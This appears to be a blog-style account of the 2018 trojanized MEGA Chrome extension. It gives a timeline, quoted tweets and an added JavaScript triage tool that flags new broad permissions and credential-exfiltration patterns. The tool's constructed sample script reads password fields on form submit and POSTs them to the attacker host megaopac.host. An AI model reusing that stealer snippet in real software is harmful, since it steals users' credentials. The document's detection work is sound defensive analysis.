Developer - Security engineer
On 4 September 2018 at 14:30 UTC, an unknown attacker managed to take over MEGA's Google Chrome Web Store account and upload a malicious version (3.39.4) of the MEGA extension to the store, according to a blog post published by the company. On installation or auto-update, the malicious extension asked for elevated permissions to read the content of every web page the user visits. With those permissions it could harvest login and registration credentials for any website, including Amazon, GitHub and Google, as well as online wallets such as MyEtherWallet and MyMonero and the Idex.market cryptocurrency trading platform. The trojanized extension then sent the stolen data to an attacker-controlled server at megaopac[.]host, hosted in Ukraine, from which the attackers could log in to the victims' accounts and extract cryptocurrency private keys to steal their funds.
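A check a practitioner would want after an incident like this, as an added example that is not from the original post or from MEGA: a small static triage pass over an extension update. Given the previous and the updated manifest.json plus the extension's scripts, it flags exactly the two things described above: newly requested broad host permissions, and script code that reads password fields and sends data to a host outside the vendor's own. The manifests, the script under scan and the allowed-host list are constructed for the example (they are not MEGA's real files); megaopac[.]host is the collection server named above and is treated as a known indicator. The permission names ("webRequest", "<all_urls>") are real Chrome extension permissions.

```javascript
// Added example, not code from the original post or from MEGA: static triage
// of a Chrome extension update. Diffs the permissions declared in two
// manifests and scans scripts for credential capture plus an outbound call to
// an unexpected host. All sample data below is constructed for the example.

const BROAD_HOST_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
const SENSITIVE_PERMISSIONS = new Set(["webRequest", "webRequestBlocking", "tabs", "cookies", "history"]);
// Collection server named in the incident reports, used here as a known IOC.
const KNOWN_IOC_HOSTS = ["megaopac.host"];

const CREDENTIAL_CAPTURE = [
  /input\[type\s*=\s*["']?password/i, // selecting password fields
  /addEventListener\(\s*["']submit["']/i, // hooking form submission
];
const OUTBOUND_CALLS = [/\bfetch\s*\(/, /XMLHttpRequest/, /navigator\.sendBeacon\s*\(/, /new\s+Image\s*\(/];
const URL_RE = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})(?::\d+)?[^\s"'`)]*/gi;

function hostAllowed(host, allowedHosts) {
  return allowedHosts.some((a) => host === a || host.endsWith("." + a));
}

// MV2 lists host patterns under "permissions"; MV3 moves them to
// "host_permissions". Content-script "matches" widen reach the same way.
function declaredPermissions(manifest) {
  const perms = [].concat(manifest.permissions || [], manifest.host_permissions || []);
  const matches = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  return new Set(perms.concat(matches));
}

// Findings for permissions present in the new manifest but not in the old one.
function diffPermissions(oldManifest, newManifest) {
  const before = declaredPermissions(oldManifest);
  const findings = [];
  for (const p of declaredPermissions(newManifest)) {
    if (before.has(p)) continue;
    if (BROAD_HOST_PATTERNS.has(p)) findings.push({ severity: "high", kind: "broad-host-permission", detail: p });
    else if (SENSITIVE_PERMISSIONS.has(p)) findings.push({ severity: "medium", kind: "sensitive-permission", detail: p });
    else findings.push({ severity: "low", kind: "new-permission", detail: p });
  }
  return findings;
}

// Findings for one script: known IOC hosts, hosts outside the vendor's own,
// and the combination of credential capture with an outbound call.
function scanScript(name, source, allowedHosts) {
  const findings = [];
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  for (const h of hosts) {
    if (KNOWN_IOC_HOSTS.includes(h)) findings.push({ severity: "high", kind: "known-ioc-host", detail: `${name}: ${h}` });
    else if (!hostAllowed(h, allowedHosts)) findings.push({ severity: "medium", kind: "unexpected-host", detail: `${name}: ${h}` });
  }
  const captures = CREDENTIAL_CAPTURE.some((re) => re.test(source));
  const sends = OUTBOUND_CALLS.some((re) => re.test(source));
  if (captures && sends) findings.push({ severity: "high", kind: "credential-exfil-pattern", detail: name });
  return findings;
}

function auditExtensionUpdate({ oldManifest, newManifest, scripts, allowedHosts }) {
  const findings = diffPermissions(oldManifest, newManifest);
  for (const [name, source] of Object.entries(scripts)) findings.push(...scanScript(name, source, allowedHosts));
  const rank = { none: 0, low: 1, medium: 2, high: 3 };
  const worst = findings.reduce((w, f) => (rank[f.severity] > rank[w] ? f.severity : w), "none");
  const verdict = worst === "high" ? "block" : worst === "medium" ? "review" : "ok";
  return { verdict, findings };
}

// Constructed sample: a release scoped to the vendor's own hosts, followed by
// an update that widens itself to every site and posts password fields away.
const SAMPLE_OLD = {
  manifest_version: 2, version: "3.39.3", permissions: ["storage", "*://*.mega.nz/*"],
  content_scripts: [{ matches: ["*://*.mega.nz/*"], js: ["content.js"] }],
};
const SAMPLE_NEW = {
  manifest_version: 2, version: "3.39.4", permissions: ["storage", "webRequest", "<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
};
const SAMPLE_SCRIPTS = {
  "content.js": [
    "document.addEventListener('submit', function (e) {",
    "  var pw = e.target.querySelector('input[type=\"password\"]');",
    "  fetch('https://megaopac.host/collect', { method: 'POST', body: pw ? pw.value : '' });",
    "});",
  ].join("\n"),
};
const ALLOWED_HOSTS = ["mega.nz", "mega.co.nz"]; // assumed vendor hosts for the example

function sampleAudit() {
  return auditExtensionUpdate({ oldManifest: SAMPLE_OLD, newManifest: SAMPLE_NEW, scripts: SAMPLE_SCRIPTS, allowedHosts: ALLOWED_HOSTS });
}

const result = sampleAudit();
console.log(`verdict: ${result.verdict}`);
for (const f of result.findings) console.log(`[${f.severity}] ${f.kind}: ${f.detail}`);
```

Run with node. On the constructed sample the verdict is "block", with four findings: the new "<all_urls>" host permission, the new "webRequest" permission, the known megaopac.host destination, and the password-field-plus-fetch pattern in content.js. Any one of the high findings is enough to stop an auto-update from being trusted; the permission diff alone is what the Chrome prompt on update was showing users, which is the signal the Reddit user acted on.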
An unknown attacker managed to log into the Chrome Web Store profile used by the MEGA team. A new MEGA Chrome extension version (3.39.4) was uploaded.
16 UTC on 4th September 2018
A Reddit user (/u/gattacus) noticed some unwanted changes in the latest version of the MEGA Chrome extension. The Chrome browser asked for new permissions to read all the content of every web page. He looked at its source code and discovered what was probably cryptocurrency-key logging. He then posted this thread to get confirmation from the community.
I read it. I thought, "Whoa, another security issue", but I was looking at the source code too. It happens! I discovered a keylogger which could log passwords, usernames and even sessions!
After discovering the keylogging, I posted a warning on Twitter. The InfoSec community and some security researchers confirmed this issue.
17.23 UTC on 4th September 2018
!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!
LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.
It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked @x0rz pic.twitter.com/TnPalqj1cz
— SerHack (@serhack_) September 4, 2018
The official Twitter account of Monero (XMR) posted a warning advising XMR holders to steer clear of the MEGA extension.
17.45 UTC on 4th September 2018
PSA: The official MEGA extension has been compromised and now includes functionality to steal your Monero: https://t.co/vzWwcM9E5k— Monero || #xmr (@monero) September 4, 2018
A security engineer, Jeremiah O'Connor, confirmed that the infrastructure was related to the earlier AWS/MyEtherWallet (MEW) BGP hijacking attack.
The megaopac[.]host domain seems to have a login panel. Unfortunately, I did not do any research about this.
What is this? ..